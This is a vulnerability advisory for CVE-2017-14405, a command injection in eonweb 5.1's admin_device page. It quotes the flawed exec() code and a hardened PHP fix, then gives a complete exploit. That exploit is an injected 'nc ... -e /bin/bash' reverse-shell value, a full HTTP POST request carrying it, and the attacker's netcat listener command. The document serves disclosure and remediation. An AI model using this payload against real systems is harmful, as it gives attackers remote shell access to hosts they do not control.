CVE-2017-14405

eonweb/module/admin_device/index.php RCE

powered by minhaizhao from Anyuntec

version: 5.1

https://github.com/EyesOfNetworkCommunity/eonweb

Vulnerability details

0x01

/srv/eyesofnetwork/eonweb-5.1/module/admin_device/index.php Line 80

if(isset($_POST['Remove'])){
    for($i=0;isset($_POST['hosts_cacti'][$i]);$i++){
        exec("/usr/bin/php $path_eon/cacti/cli/remove_device.php --device-id=".$_REQUEST['hosts_cacti'][$i]."");
    }
}
$_REQUEST['hosts_cacti'][$i] is concatenated into the exec() command line without being filtered, which leads to Remote Code Execution.
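A hardened form of the handler above, as an added example that is not code from eonweb or from the original report: the device id is accepted only if it is a plain decimal number, and every variable part of the command is quoted with escapeshellarg(). The helper names parse_device_ids() and build_remove_command(), the sample input and the $path_eon value are assumptions made for illustration.

```php
<?php
// Added example: hardened form of the Remove handler shown above.
// parse_device_ids() and build_remove_command() are hypothetical helpers,
// not functions from eonweb.

/**
 * Keep only values that are plain decimal device ids.
 * Non-arrays, nested arrays, empty strings, signs and shell syntax are dropped.
 */
function parse_device_ids($raw): array
{
    $ids = [];
    if (!is_array($raw)) {
        return $ids;
    }
    foreach ($raw as $value) {
        // ctype_digit() is true only for a non-empty string made of 0-9.
        // The length limit keeps the integer cast safe on 32-bit builds.
        if (is_string($value) && ctype_digit($value) && strlen($value) <= 9) {
            $ids[] = (int) $value;
        }
    }
    return $ids;
}

/** Build the command line with every variable part quoted for the shell. */
function build_remove_command(string $path_eon, int $id): string
{
    return '/usr/bin/php '
        . escapeshellarg($path_eon . '/cacti/cli/remove_device.php')
        . ' ' . escapeshellarg('--device-id=' . $id);
}

// Constructed sample input: one valid id and one value carrying shell syntax.
// In the real handler this would be $_POST['hosts_cacti'] ?? [], read from the
// same superglobal that the isset() check uses (the original mixes $_POST and
// $_REQUEST).
$sample   = ['hosts_cacti' => ['12', '11111;echo injected #']];
$path_eon = '/srv/eyesofnetwork'; // assumed value, not taken from the report

foreach (parse_device_ids($sample['hosts_cacti']) as $id) {
    // The handler would pass this string to exec(); here it is only printed.
    echo build_remove_command($path_eon, $id), PHP_EOL;
}
```

Only the first sample value produces a command; the second is rejected before any command string is built.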

EXP:

hosts_cacti[0]=11111;nc 192.168.91.135 8888 -e /bin/bash #

POST /module/admin_device/index.php HTTP/1.1
Host: 192.168.91.66
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 272
Referer: https://192.168.91.66/module/admin_device/
Cookie: session_id=84267189; user_name=admin; user_id=1; user_limitation=0; group_id=1
X-Forwarded-For: 127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1

cacti_hostname=0&snmp_template=5&snmp_community=EyesOfNetwork&snmp_port=161&snmp_version=2&username=admin&password=admin&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=&Remove=Remove&hosts_cacti[0]=11111;nc 192.168.91.135 8888 -e /bin/bash #

In our connect-back shell we previously set up:

nc -l -p 8888 -v
